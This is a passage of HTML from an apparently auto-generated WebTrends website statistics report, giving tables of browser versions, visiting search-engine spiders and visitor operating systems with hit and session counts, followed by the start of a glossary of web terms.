<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape 5.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">773</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10.91%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">223</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape 3.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">234</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.3%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">92</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.08%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Browsers Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>7085</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>665</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopExplorer"><!--Browsers & Platforms::Microsoft Explorer Browsers--></A>
<!-- WT_H1>Microsoft Explorer Browsers</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Microsoft Explorer Browsers</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section gives you a breakdown of the various versions of Microsoft Explorer browsers that visitors to the site are using.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index22.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Microsoft Explorer Browsers</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Microsoft Explorer Browsers</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Browser</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Explorer 5.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">34633</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">74.52%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5305</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Explorer 6.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9935</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">21.37%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1044</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Explorer 4.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1822</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.92%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">255</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Explorer 3.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">84</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.18%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">18</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Browsers Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>46474</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>6622</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopSpiders"><!--Browsers & Platforms::Visiting Spiders--></A>
<!-- WT_H1>Visiting Spiders</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Visiting Spiders</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies all robots, spiders, crawlers and search services (i.e. Alta Vista, Lycos, and Excite) visiting the site.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index23.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Visiting Spiders</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Visiting Spiders</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Spider</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>FAST-WebCrawler</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">744</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">36.88%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">103</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Scooter-W3.1.2</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">293</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14.52%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">212</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>ArchitextSpider</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">225</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.15%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">220</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mozilla/5.0 (Slurp/cat; slurp@inktomi.com; http://www.inktomi.com/slurp.html)</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">187</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9.27%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">169</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Gulliver</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">97</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.8%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">35</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mozilla/3.0 (Slurp/si; slurp@inktomi.com; http://www.inktomi.com/slurp.html)</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">64</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.17%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">34</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Scooter-W3-1.0</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">64</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.17%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>tivraSpider</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">55</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.72%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mozilla/3.0 (Slurp/cat; slurp@inktomi.com; http://www.inktomi.com/slurp.html)</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">54</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.67%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">48</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Openfind data gatherer, Openbot</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">46</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.28%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Spiders Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>1829</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>90.67%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>847</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopPlatforms"><!--Browsers & Platforms::Most Used Platforms--></A>
<!-- WT_H1>Most Used Platforms</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Used Platforms</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the operating systems most used by the visitors to the site.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index24.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Most Used Platforms</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Used Platforms</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Platform</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Others</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">40899</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">64.89%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8873</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Windows NT</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12108</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1337</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Windows Win32s</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4860</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.71%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">35</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Windows 95</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3760</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.96%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">558</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Macintosh</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1183</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.87%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">71</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Linux</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">191</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.3%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">21</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>SunOS</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">25</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.03%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Platforms Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>63026</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>10898</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<!-- ----------------- ------------- -->
<!-- ----------------- ------------- -->
<a name="Glossary"><!--Glossary::Glossary--></A>
<!-- WT_H1>Glossary</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Glossary</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000">
<!-- WT_DESCRIPTION -->Following are definitions for terms used in this report and throughout the World-Wide Web in general. These terms are also common to the WebTrends analysis tool.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P>
<FONT SIZE=3 FACE="Arial" COLOR="#000000">
<!-- GLOSSARY_START -->
<CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=2 ROWSPAN=1><FONT SIZE=+1 COLOR="#000000" FACE="Arial">
<!-- WT_TABLE_STATS>2,1.5,4.5</WT_TABLE_STATS -->
<!-- WT_NO_COLUMN_TITLES -->
<!-- WT_GLOSSARY -->
<CENTER><B>Glossary</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Glossary</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Ad</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A graphic or a banner on a web page that when clicked on, takes the visitor to another site.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Ad Clicks</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A click on an advertisement on a web site which takes a user to another site, it is referred to as an ad click.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Ad Views</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A web page that presents an ad. Once the visitor has viewed an ad, he/she can click on it (see Ad Click). There may be more than one ad on an ad view.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Authentication</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Technique by which access to Internet or Intranet resources requires the user to identify himself or herself by entering a username and password.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Bandwidth</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Measure (in kilobytes of data transferred) of the traffic on the site.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Browser</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A program used to locate and view HTML documents (Netscape, Mosaic, Microsoft Explorer, for example.)</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Click through rate</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Percentage of users who click on a viewed advertisement. This is a good indication of the effectiveness of this ad.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Client</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The browser (see above) used by a visitor to a Web site.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Client Errors</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An error occurring due to an invalid request by the visitor's browser. Client errors are in the 400-range. See "Return Code" definition.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Company Database</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The database installed and used by WebTrends to look up the company name, city, state and country corresponding to a specific domain name.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Cookies</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Persistent Client-State HTTP Cookies are files containing information about visitors to a web site (e.g., user name and preferences). This information is provided by the user during the first visit to a Web server. The server records this information in a text file and stores this file on the visitor's hard drive. When the visitor accesses the same web site again, the server looks for the cookie and configures itself based on the information provided.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Domain Name</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The text name corresponding to the numeric IP address of a computer on the Internet (i.e., www.webtrends.com).</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Domain Name Lookup</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The process of converting a numeric IP address into a text name (for example, 204.245.240.194 is converted to www.webtrends.com).</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Filters</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A means of narrowing the scope of a report or view by specifying ranges or types of data to include in or exclude.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Forms</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An HTML page which passes variables back to the server. These pages are used to gather information from users. Also referred to as scripts.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>FTP</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">File Transfer Protocol is a standard method of sending files between computers over the Internet.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>GIF</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Graphics Interchange Format is an image file format commonly used in HTML documents.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Hit</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An action on the Web site, such as when a user views a page or downloads a file.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Home Page</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The main page of a Web site. The home page provides visitors with an overview and links to the rest of the site. It often contains or links to a Table of contents for the site.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Home Page URL</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The local path or Internet URL to the default page of the Web site for which WebTrends reports will be generated.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>HTML</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Hyper Text Markup Language is used to write documents for the World Wide Web to specify hypertext links between related objects and documents.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>HTTP</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Hyper Text Transfer Protocol is a standard method of transferring data between a Web <B>server</B> and a Web <B>browser</B>.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>IP Address</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Internet Protocol address identifying a computer connected to the Internet.</TD></TR>
